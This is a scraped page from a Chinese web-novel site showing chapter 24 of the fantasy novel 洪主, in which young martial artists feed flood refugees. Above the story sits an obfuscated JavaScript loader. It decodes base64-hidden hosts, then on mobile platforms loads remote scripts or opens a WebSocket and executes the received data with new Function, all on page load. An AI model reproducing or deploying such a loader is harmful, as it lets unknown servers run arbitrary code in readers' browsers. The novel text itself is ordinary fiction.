笔趣阁

字:
关灯 护眼
笔趣阁 > 洪主 > 第二十四章云洪闭关
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第二十四章云洪闭关

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
请下载APP‘起点读书’支持正版阅读
  
  请下载APP‘起点读书’支持正版阅读
  
  扬州,中域九州之一,境内多大江大河。
  
  宁阳郡,扬州下属九郡中一个普通郡府,阳河和宁江交汇之所,境内有纵横数千里的黑龙湖。
  
  成阳历6121年,大乾362年。
  
  六月上旬,黑龙湖、宁江连降大雨,水流暴涨,连绵一月有余。
  
  七月,大泽妖王趁势作乱,三河县东大坝垮塌,宁江洪水漫流,泽国千里,浮尸遍野,灾民易子而食,妖兽噬尸于荒野。
  
  八月,人族仙人斩妖王于宁江之畔,洪水退,旋即,数十万灾民涌向宁阳郡城及周围各个县城。
  
  ...
  
  九月初的夏末,太阳初升,便已炎热燥人。
  
  东河县,县城。
  
  城池东门外灾民的第九安置区,棚户杂乱,杂物遍地,即使洪水已退去大半月,依旧可见地面泥泞湿滑。
  
  “粥来了。”
  
  “粥来了。”
  
  “孩童妇孺先取,余者依次排队,人人有份,不要争抢。”
  
  在安置区边缘的空旷地带,临时搭建着十余排房屋,少数穿着黑衣的精干少年和一些妇女正在施粥。
  
  一旁,数十位黑衣少年个个面容严肃,维持着灾民秩序。
  
  粥棚外,上千流民排队领取着粥食,个个瘦弱枯槁,不是没人想要争抢,但自从自持武力的数十青壮被六名黑衣少年联手镇压,整个营地的秩序便安稳下来了。
  
  这些灾民隐约明白,这些看似稚气未脱的少年,恐怕都是这座县城武院弟子,皆是修习武道的修士,可称武士。
  
  虽年少,亦有斩妖之能。
  
  “云洪。”一道清澈悦耳的声音忽在营地外响起。
  
  “云师兄。”
  
  “有人找你。”
  
  在棚内施粥的众多黑衣少年中,有着一位腰系令牌的紫衣少年,身高接近成人,脸庞上稚气未脱,行事却极为沉稳,充满着朝气,正将一份份粥饭打好递给排队的灾民。
  
  听到声音,紫衣少年不由抬起头。
  
  灾民的队伍一旁,正站着一位微笑着的紫衣少女,她的身旁是两名冷漠的高大劲装护卫,不断警惕的扫视四周。
  
  维持秩序的劲装黑衣少年余光都望着。
  
  “呦~云哥,叶澜师姐来了,还不快去?”一旁的一名胖乎乎的黑衣少年对着云洪挤眉弄眼。
  
  “有钱,你来替我,我出去一下。”云洪拍了拍胖乎乎的少年。
  
  胖乎乎少年苦瓜着脸:“云哥,我要重申,我叫游谦,我真没钱。”
  
  “等你继承老爹的酒楼,你有有钱了,快去干活。”云洪笑道,又依次向其他黑衣少年吩咐,这才迈步走出粥棚,来到紫衣少女身前。
  
  “叶澜。”云洪看着眼前的紫衣少女。
  
  “云洪,你武道修炼厉害我认了,连管理营地这种事情都干得好。”紫衣少女观察着周围粥棚,忍不住道:“上次我陪父亲来这营地还很脏乱,你才来半个月,变化就这么大。”
  
  “一有阳教官指点,二也是武院的众多弟子一起努力,最重要的还是叶将军劝动县令大人开仓放粮,粮食才是最重要的.....不然,也没有现在这番景象。”云洪感慨道。
  
  云洪忽的笑道:“不谈这些,总归一切都在好转,六县大比在即,武院中的精英弟子都在拼命修炼,你来我这干什么?”
  
  “武院可不要求精英弟子来此。”云洪看着少女。
  
  “精英弟子?”紫衣少女哼道:“你可是烈火殿弟子,甚至在烈火殿中都排名靠前,你都愿耗费时间来此,我为什么不能来?”
  
  云洪不由一笑。
  
  武院中,以实力定高低,众多弟子大致分为普通、精英两个层次,而唯有精英中的精英才能进入烈火殿修行。
  
  “不和你扯了,我带了很多吃食和衣物。”紫衣少女指了指远处道路上的四辆大车,“你现在算是营地百将,和我一起将东西送到去遗孤营吧。”
  
  “这半个月,你都送三次了。”云洪笑着。
  
  紫衣少女摇头:“等遗孤营的少年都安置好,我就不送了。”
  
  云洪轻轻点头。
  
  这是洪灾,更有妖怪作乱,波及数郡之地,足足数十万灾民,虽然来到东河县灾民不算多,可想安置好孤儿,谈何容易?
  
  但云洪并不想和叶澜说的太多,她贵为东河县镇守将军嫡女,能有这一份善心便值得称赞。
  
  “走吧。”云洪笑着。
  
  两人离开粥棚。
  
  目送着云洪和叶澜离去,粥棚中的黑衣少年们和负责做饭施粥的妇女们则是议论开。
  
  “云师兄和叶小姐真是般配。”一名短发黑衣少年忍不住道。
  
  胖乎乎少年游谦笑道:“那是自然,武院弟子八百,汇聚我东河九镇精英,论文试云哥只算前百,可武学一道,云哥已是易筋巅峰,在府院精英弟子中都是绝对前五。”
  
  “文试能过关即可,武道才是正途,云师兄十五岁便达易筋巅峰,将来达到九重通灵的希望很大,甚至有望达到十重归窍。”另一位高个黑衣少年感慨道。
  
  另一位黑衣少年眼神放光:“归窍武者,放眼整个宁阳郡都是真正的大人物了。”
  
  其他黑衣弟子不由点头。
  
  大乾帝国重教化,州、郡、县分别设立州宗、府院、县武三级武院,东河县管辖九镇,方圆数百里之地,人口百万,能考入县级武院的可谓优秀。
  
  即使如此,东河武院八百弟子,多数弟子毕业前也只能达到淬体四重、五重,只有极少数精英弟子才能达到易筋巅峰,即淬体六重。
  
  至于更高的七重凝脉?
  
  如今的整个武院中也仅有两位弟子达到。
  
  更高的八重九重武者,正常情况下不是武院弟子能达到的,毕竟这些武院弟子皆是少年,在武院修行四到五年便会毕业。
  
  “那些精英弟子,一个个都只抓紧时间修炼,哪像云师兄,还会来和我们一起来救助灾民?”
  
  短发黑衣少年哼道:“十三位烈火殿弟子,刘铭是县丞之子,吴河、汪东等也是豪强子弟,也就云师兄和我们一样,是从平民中走出来的。”
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师